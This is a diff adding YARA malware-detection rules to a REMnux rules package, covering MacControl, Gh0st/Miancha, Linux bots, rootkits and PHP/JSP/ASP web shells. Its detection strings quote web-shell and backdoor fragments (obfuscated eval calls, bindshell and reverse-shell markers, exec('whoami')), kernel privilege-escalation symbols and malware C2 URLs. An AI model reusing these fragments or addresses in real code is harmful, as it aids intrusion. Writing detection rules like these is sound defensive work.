+		description = "rule for lurk0"
+		author = "Katie Kleemola"
+		last_updated = "07-22-2014"
+
+	condition:
+		LURK0Header and SharedStrings
+
+}
+
+
+rule CCTV0 : Family CCTV0 {
+
+	meta:
+		description = "rule for cctv0"
+		author = "Katie Kleemola"
+		last_updated = "07-22-2014"
+
+	condition:
+		CCTV0Header and SharedStrings
+
+}
+
+
diff -Nru remnux-rules-0.0.3/yara.old/MacControl.yara remnux-rules-0.0.4/yara.old/MacControl.yara
--- remnux-rules-0.0.3/yara.old/MacControl.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/MacControl.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,56 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule MacControlCode : MacControl Family 
+{
+    meta:
+        description = "MacControl code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-17"
+        
+    strings:
+        // Load these function strings 4 characters at a time. These check the first two blocks:
+        $L4_Accept = { C7 ?? 41 63 63 65 C7 ?? 04 70 74 3A 20 }
+        $L4_AcceptLang = { C7 ?? 41 63 63 65 C7 ?? 04 70 74 2D 4C }
+        $L4_Pragma = { C7 ?? 50 72 61 67 C7 ?? 04 6D 61 3A 20 }
+        $L4_Connection = { C7 ?? 43 6F 6E 6E C7 ?? 04 65 63 74 69 }
+        $GEThgif = { C7 ?? 47 45 54 20 C7 ?? 04 2F 68 2E 67 }
+        
+    condition:
+        all of ($L4*) or $GEThgif
+}
+
+rule MacControlStrings : MacControl Family
+{
+    meta:
+        description = "MacControl Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-17"
+        
+    strings:
+        $ = "HTTPHeadGet"
+        $ = "/Library/launched"
+        $ = "My connect error with no ip!"
+        $ = "Send File is Failed"
+        $ = "****************************You Have got it!****************************"
+        
+    condition:
+        any of them
+}
+
+rule MacControl : Family
+{
+    meta:
+        description = "MacControl"
+        author = "Seth Hardy"
+        last_modified = "2014-06-16"
+        
+    condition:
+        MacControlCode or MacControlStrings
+}
+
+
diff -Nru remnux-rules-0.0.3/yara.old/Miancha.yara remnux-rules-0.0.4/yara.old/Miancha.yara
--- remnux-rules-0.0.3/yara.old/Miancha.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Miancha.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,40 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule Trojan_W32_Gh0stMiancha_1_0_0
+{
+    meta:
+        Author      = "Context Threat Intelligence"
+        Date        = "2014/01/27"
+        Description = "Bytes inside"
+        Reference   = "http://www.contextis.com/documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf"
+
+    strings:
+        $0x = { 57 5b 5a 5a 51 57 40 34 31 67 2e 31 70 34 5c 40 40 44 3b 25 3a 19 1e 5c 7b 67 60 2e 34 31 67 2e 31 70 19 1e 55 77 77 71 64 60 2e 34 3e 3b 3e 19 1e 57 7b 7a 60 71 7a 60 39 40 6d 64 71 2e 34 60 71 6c 60 3b 7c 60 79 78 19 1e 44 66 7b 6c 6d 39 57 7b 7a 7a 71 77 60 7d 7b 7a 2e 34 5f 71 71 64 39 55 78 7d 62 71 19 1e 57 7b 7a 60 71 7a 60 39 78 71 7a 73 60 7c 2e 34 24 19 1e 19 1e }
+        $1 = { 5c e7 99 bd e5 8a a0 e9 bb 91 5c }
+        $1x = { 48 f3 8d a9 f1 9e b4 fd af 85 48 }
+        $2 = "DllCanLoadNow"
+        $2x = { 50 78 78 57 75 7a 58 7b 75 70 5a 7b 63 }
+        $3x = { 5a 61 79 76 71 66 34 7b 72 34 67 61 76 7f 71 6d 67 2e 34 31 70 } 
+        $4 = "JXNcc2hlbGxcb3Blblxjb21tYW5k"
+        $4x = { 5e 4c 5a 77 77 26 7c 78 76 53 6c 77 76 27 56 78 76 78 6c 7e 76 26 25 60 4d 43 21 7f }
+        $5 = "SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA=="
+        $5x = { 47 51 52 47 46 52 70 56 41 7f 42 77 46 51 42 40 45 25 5e 5e 41 52 46 5e 40 24 21 77 41 27 78 6e 70 53 42 60 4c 51 5a 78 76 7a 46 6d 4d 43 6c 45 77 79 2d 7e 4e 4c 5a 6e 76 27 5e 77 59 55 29 29 }
+        $6 = "C:\\Users\\why\\"
+        $6x = { 57 2e 48 41 67 71 66 67 48 63 7c 6d 48 }
+        $7 = "g:\\ykcx\\"
+        $7x = { 73 2E 48 6D 7F 77 6C 48 }
+        $8 = "(miansha)"
+        $8x = { 3C 79 7D 75 7A 67 7C 75 3D }
+        $9 = "server(\xE5\xA3\xB3)"
+        $9x = { 7C 2E 48 26 24 25 27 3A 25 25 3A 26 21 48 67 71 66 62 71 66 3C F1 B7 A7 3D 48 46 71 78 71 75 67 71 48 67 71 66 62 71 66 3A 64 70 76 }
+        $cfgDecode = { 8a ?? ?? 80 c2 7a 80 f2 19 88 ?? ?? 41 3b ce 7c ??}
+
+   condition:
+       any of them
+}
diff -Nru remnux-rules-0.0.3/yara.old/Miscelanea_Linux.yara remnux-rules-0.0.4/yara.old/Miscelanea_Linux.yara
--- remnux-rules-0.0.3/yara.old/Miscelanea_Linux.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Miscelanea_Linux.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,206 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule LinuxAESDDoS
+{
+    meta:
+	Author = "@benkow_"
+	Date = "2014/09/12"
+	Description = "Strings inside"
+        Reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
+
+    strings:
+        $a = "3AES"
+        $b = "Hacker"
+        $c = "VERSONEX"
+
+    condition:
+        2 of them
+}
+
+rule LinuxBillGates 
+{
+    meta:
+       Author      = "@benkow_"
+       Date        = "2014/08/11" 
+       Description = "Strings inside"
+       Reference   = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3429" 
+
+    strings:
+        $a= "12CUpdateGates"
+        $b= "11CUpdateBill"
+
+    condition:
+        $a and $b
+}
+
+rule LinuxElknot
+{
+    meta:
+	Author      = "@benkow_"
+        Date        = "2013/12/24" 
+        Description = "Strings inside"
+        Reference   = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3099"
+
+    strings:
+        $a = "ZN8CUtility7DeCryptEPciPKci"
+	$b = "ZN13CThreadAttack5StartEP11CCmdMessage"
+
+    condition:
+	all of them
+}
+
+rule LinuxMrBlack
+{
+    meta:
+	Author      = "@benkow_"
+        Date        = "2014/09/12" 
+        Description = "Strings inside"
+        Reference   = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
+
+    strings:
+        $a = "Mr.Black"
+	$b = "VERS0NEX:%s|%d|%d|%s"
+    condition:
+        $a and $b
+}
+
+rule LinuxTsunami
+{
+    meta:
+	author = "@benkow_"
+        description = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
+
+    strings:
+        $a = "PRIVMSG %s :[STD]Hitting %s"
+        $b = "NOTICE %s :TSUNAMI <target> <secs>"
+        $c = "NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually."
+    condition:
+        $a or $b or $c
+}
+
+rule rootkit
+{
+	meta:
+                author="xorseed"
+                reference= "https://stuff.rop.io/"
+	strings:
+		$sys1 = "sys_write" nocase ascii wide	
+		$sys2 = "sys_getdents" nocase ascii wide
+		$sys3 = "sys_getdents64" nocase ascii wide
+		$sys4 = "sys_getpgid" nocase ascii wide
+		$sys5 = "sys_getsid" nocase ascii wide
+		$sys6 = "sys_setpgid" nocase ascii wide
+		$sys7 = "sys_kill" nocase ascii wide
+		$sys8 = "sys_tgkill" nocase ascii wide
+		$sys9 = "sys_tkill" nocase ascii wide
+		$sys10 = "sys_sched_setscheduler" nocase ascii wide
+		$sys11 = "sys_sched_setparam" nocase ascii wide
+		$sys12 = "sys_sched_getscheduler" nocase ascii wide
+		$sys13 = "sys_sched_getparam" nocase ascii wide
+		$sys14 = "sys_sched_setaffinity" nocase ascii wide
+		$sys15 = "sys_sched_getaffinity" nocase ascii wide
+		$sys16 = "sys_sched_rr_get_interval" nocase ascii wide
+		$sys17 = "sys_wait4" nocase ascii wide
+		$sys18 = "sys_waitid" nocase ascii wide
+		$sys19 = "sys_rt_tgsigqueueinfo" nocase ascii wide
+		$sys20 = "sys_rt_sigqueueinfo" nocase ascii wide
+		$sys21 = "sys_prlimit64" nocase ascii wide
+		$sys22 = "sys_ptrace" nocase ascii wide
+		$sys23 = "sys_migrate_pages" nocase ascii wide
+		$sys24 = "sys_move_pages" nocase ascii wide
+		$sys25 = "sys_get_robust_list" nocase ascii wide
+		$sys26 = "sys_perf_event_open" nocase ascii wide
+		$sys27 = "sys_uname" nocase ascii wide
+		$sys28 = "sys_unlink" nocase ascii wide
+		$sys29 = "sys_unlikat" nocase ascii wide
+		$sys30 = "sys_rename" nocase ascii wide
+		$sys31 = "sys_read" nocase ascii wide
+		$sys32 = "kobject_del" nocase ascii wide
+		$sys33 = "list_del_init" nocase ascii wide
+		$sys34 = "inet_ioctl" nocase ascii wide
+	condition:
+		9 of them
+}
+
+rule exploit
+{
+        meta:
+                author="xorseed"
+                reference= "https://stuff.rop.io/"
+	strings:
+		$xpl1 = "set_fs_root" nocase ascii wide
+		$xpl2 = "set_fs_pwd" nocase ascii wide
+		$xpl3 = "__virt_addr_valid" nocase ascii wide
+		$xpl4 = "init_task" nocase ascii wide
+		$xpl5 = "init_fs" nocase ascii wide
+		$xpl6 = "bad_file_ops" nocase ascii wide
+		$xpl7 = "bad_file_aio_read" nocase ascii wide
+		$xpl8 = "security_ops" nocase ascii wide
+		$xpl9 = "default_security_ops" nocase ascii wide
+		$xpl10 = "audit_enabled" nocase ascii wide
+		$xpl11 = "commit_creds" nocase ascii wide
+		$xpl12 = "prepare_kernel_cred" nocase ascii wide
+		$xpl13 = "ptmx_fops" nocase ascii wide
+		$xpl14 = "node_states" nocase ascii wide
+	condition:
+		7 of them
+}
+
+rule ldpreload
+{
+        meta:
+                author="xorseed"
+                reference= "https://stuff.rop.io/"
+	strings:
+		$a = "dlopen" nocase ascii wide
+		$b = "dlsym" nocase ascii wide
+		$c = "fopen" nocase ascii wide
+		$d = "fopen64" nocase ascii wide
+		$e = "__fxstat" nocase ascii wide
+		$f = "__fxstat64" nocase ascii wide
+		$g = "accept" nocase ascii wide
+		$h = "__lxstat" nocase ascii wide
+		$i = "__lxstat64" nocase ascii wide
+		$j = "open" nocase ascii wide
+		$k = "rmdir" nocase ascii wide
+		$l = "__xstat" nocase ascii wide
+		$m = "__xstat64" nocase ascii wide
+		$n = "unlink" nocase ascii wide
+		$o = "unlikat" nocase ascii wide
+		$p = "fdopendir" nocase ascii wide
+		$q = "opendir" nocase ascii wide
+		$r = "readdir" nocase ascii wide
+		$s = "readdir64" nocase ascii wide
+	condition:
+		($a or $b) and 5 of them
+}
+
+rule keylogger
+{
+        meta:
+                author="xorseed"
+                reference="https://stuff.rop.io/"
+	strings:
+		$a = "XListInputDevices" ascii wide
+		$b = "XOpenDevice" ascii wide
+		$c = "XOpenIM" ascii wide
+		$d = "XGetIMValues" ascii wide
+		$e = "XmbLookupString" ascii wide
+		$f = "XFree" ascii wide
+		$g = "XCreateIC" ascii wide
+		$h = "XOpenDisplay" ascii wide
+		$i = "XNextEvent" ascii wide
+		$j = "XInternAtom" ascii wide
+		$k = "XSelectExtensionEvent" ascii wide
+		$l = "XFreeDeviceList" ascii wide
+		$m = "XGetWindowProperty" ascii wide
+		$n = "XkbKeycodeToKeysym" ascii wide
+	condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara.old/Miscelanea_RTF.yara remnux-rules-0.0.4/yara.old/Miscelanea_RTF.yara
--- remnux-rules-0.0.3/yara.old/Miscelanea_RTF.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Miscelanea_RTF.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,25 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule rtf_multiple
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Multiple"
+	version = "0.1"
+	reference = "fd69a799e21ccb308531ce6056944842" 
+	date = "01/04/2014"
+strings:
+	$rtf = { 7b 5c 72 74 ?? ?? } // {\rt01 {\rtf1 {\rtxa
+    	$string1  = "author user"
+	$string2   = "title Vjkygdjdtyuj" nocase
+	$string3    = "company ooo"
+	$string4  = "password 00000000"
+condition:
+    ($rtf at 0) and (all of ($string*))
+}
diff -Nru remnux-rules-0.0.3/yara.old/Miscelanea.yara remnux-rules-0.0.4/yara.old/Miscelanea.yara
--- remnux-rules-0.0.3/yara.old/Miscelanea.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Miscelanea.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,617 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule tran_duy_linh
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Misc."
+	version = "0.2"
+	reference = "8fa804105b1e514e1998e543cd2ca4ea, 872876cfc9c1535cd2a5977568716ae1, etc." 
+	date = "01/03/2014"
+strings:
+	$doc = {D0 CF 11 E0} //DOCFILE0
+	$string1 = "Tran Duy Linh" fullword
+	$string2 = "DLC Corporation" fullword
+condition:
+    ($doc at 0) and (all of ($string*))
+}
+
+rule misc_iocs
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Misc."
+	version = "0.1"
+	reference = "N/A" 
+strings:
+	$doc = {D0 CF 11 E0} //DOCFILE0
+	$s1 = "dw20.exe"
+	$s2 = "cmd /"
+condition:
+    ($doc at 0) and (1 of ($s*))
+}
+
+rule malicious_LNK_files
+{
+meta:
+	author = "@patrickrolsen"
+strings:
+	$magic = {4C 00 00 00 01 14 02 00} // L.......
+	$s1 = "\\RECYCLER\\" wide
+	$s2 = "%temp%" wide
+	$s3 = "%systemroot%\\system32\\cmd.exe" wide
+	//$s4 = "./start" wide
+	$s5 = "svchost.exe" wide
+	$s6 = "lsass.exe" wide
+	$s7 = "csrss.exe" wide
+	$s8 = "winlogon.exe" wide
+	//$s9 = "%cd%" wide
+	$s10 = "%appdata%" wide
+	$s11 = "%programdata%" wide
+	$s12 = "%localappdata%" wide
+	$s13 = ".cpl" wide
+condition:
+	($magic at 0) and any of ($s*)
+}
+
+rule memory_pivy
+
+{
+   meta:
+	  author = "https://github.com/jackcr/"
+   strings:
+      $a = {00 00 00 00 00 00 00 00 00 00 00 53 74 75 62 50 61 74 68 00} // presence of pivy in memory
+
+   condition: 
+      any of them
+
+}
+
+rule memory_shylock
+
+{
+   meta:
+	  author = "https://github.com/jackcr/"
+
+   strings:
+      $a = /pipe\\[A-F0-9]{32}/     //Named pipe created by the malware
+      $b = /id=[A-F0-9]{32}/     //Portion or the uri beacon
+      $c = /MASTER_[A-F0-9]{32}/     //Mutex created by the malware
+      $d = "***Load injects by PIPE (%s)" //String found in binary
+      $e = "***Load injects url=%s (%s)" //String found in binary
+      $f = "*********************** Ping Ok ************************" //String found in binary
+      $g = "*** LOG INJECTS *** %s"     //String found in binary
+
+   condition: 
+      any of them
+
+}
+
+rule RookieStrings : Rookie Family
+{
+    meta:
+        description = "Rookie Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $ = "RookIE/1.0"
+        
+    condition:
+       any of them
+}
+
+rule ScanBox_Malware_Generic {
+	meta:
+		description = "Scanbox Chinese Deep Panda APT Malware http://goo.gl/MUUfjv and http://goo.gl/WXUQcP"
+		author = "Florian Roth"
+		reference1 = "http://goo.gl/MUUfjv"
+		reference2 = "http://goo.gl/WXUQcP"
+		date = "2015/02/28"
+		hash1 = "8d168092d5601ebbaed24ec3caeef7454c48cf21366cd76560755eb33aff89e9"
+		hash2 = "d4be6c9117db9de21138ae26d1d0c3cfb38fd7a19fa07c828731fa2ac756ef8d"
+		hash3 = "3fe208273288fc4d8db1bf20078d550e321d9bc5b9ab80c93d79d2cb05cbf8c2"
+	strings:
+		/* Sample 1 */
+		$s0 = "http://142.91.76.134/p.dat" fullword ascii
+		$s1 = "HttpDump 1.1" fullword ascii
+		
+		/* Sample 2 */
+		$s3 = "SecureInput .exe" fullword wide
+		$s4 = "http://extcitrix.we11point.com/vpn/index.php?ref=1" fullword ascii
+		
+		/* Sample 3 */
+		$s5 = "%SystemRoot%\\System32\\svchost.exe -k msupdate" fullword ascii
+		$s6 = "ServiceMaix" fullword ascii		
+		
+		/* Certificate and Keywords */
+		$x1 = "Management Support Team1" fullword ascii
+		$x2 = "DTOPTOOLZ Co.,Ltd.0" fullword ascii
+		$s3 = "SEOUL1" fullword ascii
+	condition:
+		( 1 of ($s*) and 2 of ($x*) ) or 
+		( 3 of ($x*) )
+}
+
+rule TrojanDownloader {
+	meta:
+		description = "Trojan Downloader - Flash Exploit Feb15"
+		author = "Florian Roth"
+		reference = "http://goo.gl/wJ8V1I"
+		date = "2015/02/11"
+		hash = "5b8d4280ff6fc9c8e1b9593cbaeb04a29e64a81e"
+		score = 60
+	strings:
+		$x1 = "Hello World!" fullword ascii
+		$x2 = "CONIN$" fullword ascii
+			
+		$s6 = "GetCommandLineA" fullword ascii
+		$s7 = "ExitProcess" fullword ascii
+		$s8 = "CreateFileA" fullword ascii						
+
+		$s5 = "SetConsoleMode" fullword ascii		
+		$s9 = "TerminateProcess" fullword ascii	
+		$s10 = "GetCurrentProcess" fullword ascii
+		$s11 = "UnhandledExceptionFilter" fullword ascii
+		$s3 = "user32.dll" fullword ascii
+		$s16 = "GetEnvironmentStrings" fullword ascii
+		$s2 = "GetLastActivePopup" fullword ascii		
+		$s17 = "GetFileType" fullword ascii
+		$s19 = "HeapCreate" fullword ascii
+		$s20 = "VirtualFree" fullword ascii
+		$s21 = "WriteFile" fullword ascii
+		$s22 = "GetOEMCP" fullword ascii
+		$s23 = "VirtualAlloc" fullword ascii
+		$s24 = "GetProcAddress" fullword ascii
+		$s26 = "FlushFileBuffers" fullword ascii
+		$s27 = "SetStdHandle" fullword ascii
+		$s28 = "KERNEL32.dll" fullword ascii
+	condition:
+		$x1 and $x2 and ( all of ($s*) ) and filesize < 35000
+}
+
+rule Embedded_EXE_Cloaking {
+        meta:
+                description = "Detects an embedded executable in a non-executable file"
+                author = "Florian Roth"
+                date = "2015/02/27"
+                score = 80
+        strings:
+                $noex_png = { 89 50 4E 47 }
+                $noex_pdf = { 25 50 44 46 }
+                $noex_rtf = { 7B 5C 72 74 66 31 }
+                $noex_jpg = { FF D8 FF E0 }
+                $noex_gif = { 47 49 46 38 }
+                $mz  = { 4D 5A }
+                $a1 = "This program cannot be run in DOS mode"
+                $a2 = "This program must be run under Win32"
+        condition:
+                (
+                        ( $noex_png at 0 ) or
+                        ( $noex_pdf at 0 ) or
+                        ( $noex_rtf at 0 ) or
+                        ( $noex_jpg at 0 ) or
+                        ( $noex_gif at 0 )
+                )
+                and
+                for any i in (1..#mz): ( @a1 < ( @mz[i] + 200 ) or @a2 < ( @mz[i] + 200 ) )
+}
+
+rule Cloaked_as_JPG {
+        meta:
+                description = "Detects a cloaked file as JPG"
+                author = "Florian Roth (eval section from Didier Stevens)"
+                date = "2015/02/29"
+                score = 70
+        strings:
+                $ext = "extension: .jpg"
+        condition:
+                $ext and uint16be(0x00) != 0xFFD8
+}
+
+rule WindowsCredentialEditor
+{
+    meta: 
+    	description = "Windows Credential Editor" threat_level = 10 score = 90
+    strings:
+		$a = "extract the TGT session key"
+		$b = "Windows Credentials Editor"
+    condition: 
+    	$a or $b
+}
+
+rule Amplia_Security_Tool
+{
+    meta: 
+		description = "Amplia Security Tool" 
+		score = 60
+		nodeepdive = 1
+    strings:
+		$a = "Amplia Security"
+		$b = "Hernan Ochoa"
+		$c = "getlsasrvaddr.exe"
+		$d = "Cannot get PID of LSASS.EXE"
+		$e = "extract the TGT session key"
+		$f = "PPWDUMP_DATA"
+    condition: 1 of them
+}
+
+
+
+rule perlbot_pl {
+	meta:
+		description = "Semi-Auto-generated  - file perlbot.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "7e4deb9884ffffa5d82c22f8dc533a45"
+	strings:
+		$s0 = "my @adms=(\"Kelserific\",\"Puna\",\"nod32\")"
+		$s1 = "#Acesso a Shel - 1 ON 0 OFF"
+	condition:
+		1 of them
+}
+rule php_backdoor_php {
+	meta:
+		description = "Semi-Auto-generated  - file php-backdoor.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
+	strings:
+		$s0 = "http://michaeldaw.org   2006"
+		$s1 = "or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win"
+		$s3 = "coded by z0mbie"
+	condition:
+		1 of them
+}
+rule Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php {
+	meta:
+		description = "Semi-Auto-generated  - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
+	strings:
+		$s0 = "<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</opt"
+		$s1 = "Liz0ziM Private Safe Mode Command Execuriton Bypass"
+		$s2 = "echo \"<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>\";" fullword
+	condition:
+		1 of them
+}
+rule Nshell__1__php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Nshell (1).php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "973fc89694097a41e684b43a21b1b099"
+	strings:
+		$s0 = "echo \"Command : <INPUT TYPE=text NAME=cmd value=\".@stripslashes(htmlentities($"
+		$s1 = "if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";" fullword
+	condition:
+		1 of them
+}
+rule shankar_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file shankar.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "6eb9db6a3974e511b7951b8f7e7136bb"
+	strings:
+		$sAuthor = "ShAnKaR"
+		$s0 = "<input type=checkbox name='dd' \".(isset($_POST['dd'])?'checked':'').\">DB<input"
+		$s3 = "Show<input type=text size=5 value=\".((isset($_POST['br_st']) && isset($_POST['b"
+	condition:
+		1 of ($s*) and $sAuthor
+}
+rule Casus15_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Casus15.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5e2ede2d1c4fa1fcc3cbfe0c005d7b13"
+	strings:
+		$s0 = "copy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_na"
+		$s2 = "echo \"<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'"
+		$s3 = "value='Calistirmak istediginiz "
+	condition:
+		1 of them
+}
+rule small_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file small.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "fcee6226d09d150bfa5f103bee61fbde"
+	strings:
+		$s1 = "$pass='abcdef1234567890abcdef1234567890';" fullword
+		$s2 = "eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1"
+		$s4 = "@ini_set('error_log',NULL);" fullword
+	condition:
+		2 of them
+}
+rule shellbot_pl {
+	meta:
+		description = "Semi-Auto-generated  - file shellbot.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "b2a883bc3c03a35cfd020dd2ace4bab8"
+	strings:
+		$s0 = "ShellBOT"
+		$s1 = "PacktsGr0up"
+		$s2 = "CoRpOrAtIoN"
+		$s3 = "# Servidor de irc que vai ser usado "
+		$s4 = "/^ctcpflood\\s+(\\d+)\\s+(\\S+)"
+	condition:
+		2 of them
+}
+rule fuckphpshell_php {
+	meta:
+		description = "Semi-Auto-generated  - file fuckphpshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "554e50c1265bb0934fcc8247ec3b9052"
+	strings:
+		$s0 = "$succ = \"Warning! "
+		$s1 = "Don`t be stupid .. this is a priv3 server, so take extra care!"
+		$s2 = "\\*=-- MEMBERS AREA --=*/"
+		$s3 = "preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_SESSION['o"
+	condition:
+		2 of them
+}
+rule ngh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file ngh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "c372b725419cdfd3f8a6371cfeebc2fd"
+	strings:
+		$s0 = "Cr4sh_aka_RKL"
+		$s1 = "NGH edition"
+		$s2 = "/* connectback-backdoor on perl"
+		$s3 = "<form action=<?=$script?>?act=bindshell method=POST>"
+		$s4 = "$logo = \"R0lGODlhMAAwAOYAAAAAAP////r"
+	condition:
+		1 of them
+}
+rule jsp_reverse_jsp {
+	meta:
+		description = "Semi-Auto-generated  - file jsp-reverse.jsp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8b0e6779f25a17f0ffb3df14122ba594"
+	strings:
+		$s0 = "// backdoor.jsp"
+		$s1 = "JSP Backdoor Reverse Shell" 
+		$s2 = "http://michaeldaw.org" 
+	condition:
+		1 of them
+}
+rule Tool_asp {
+	meta:
+		description = "Semi-Auto-generated  - file Tool.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8febea6ca6051ae5e2ad4c78f4b9c1f2"
+	strings:
+		$s0 = "mailto:rhfactor@antisocial.com"
+		$s2 = "?raiz=root"
+		$s3 = "DIGO CORROMPIDO<BR>CORRUPT CODE"
+		$s4 = "key = \"5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA0"
+	condition:
+		2 of them
+}
+rule NT_Addy_asp {
+	meta:
+		description = "Semi-Auto-generated  - file NT Addy.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "2e0d1bae844c9a8e6e351297d77a1fec"
+	strings:
+		$s0 = "NTDaddy v1.9 by obzerve of fux0r inc"
+		$s2 = "<ERROR: THIS IS NOT A TEXT FILE>"
+		$s4 = "RAW D.O.S. COMMAND INTERFACE"
+	condition:
+		1 of them
+}
+rule SimAttacker___Vrsion_1_0_0___priv8_4_My_friend_php {
+	meta:
+		description = "Semi-Auto-generated  - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "089ff24d978aeff2b4b2869f0c7d38a3"
+	strings:
+		$s0 = "SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend"
+		$s3 = " fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
+		$s4 = "echo \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora"
+	condition:
+		1 of them
+}
+rule RemExp_asp {
+	meta:
+		description = "Semi-Auto-generated  - file RemExp.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "aa1d8491f4e2894dbdb91eec1abc2244"
+	strings:
+		$s0 = "<title>Remote Explorer</title>"
+		$s3 = " FSO.CopyFile Request.QueryString(\"FolderPath\") & Request.QueryString(\"CopyFi"
+		$s4 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
+	condition:
+		2 of them
+}
+rule phvayvv_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file phvayvv.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "35fb37f3c806718545d97c6559abd262"
+	strings:
+		$s0 = "{mkdir(\"$dizin/$duzenx2\",777)"
+		$s1 = "$baglan=fopen($duzkaydet,'w');"
+		$s2 = "PHVayv 1.0"
+	condition:
+		1 of them
+}
+rule klasvayv_asp {
+	meta:
+		description = "Semi-Auto-generated  - file klasvayv.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "2b3e64bf8462fc3d008a3d1012da64ef"
+	strings:
+		$s1 = "set aktifklas=request.querystring(\"aktifklas\")"
+		$s2 = "action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>"
+		$s3 = "<font color=\"#858585\">www.aventgrup.net"
+		$s4 = "style=\"BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT"
+	condition:
+		1 of them
+}
+rule r57shell_php_php {
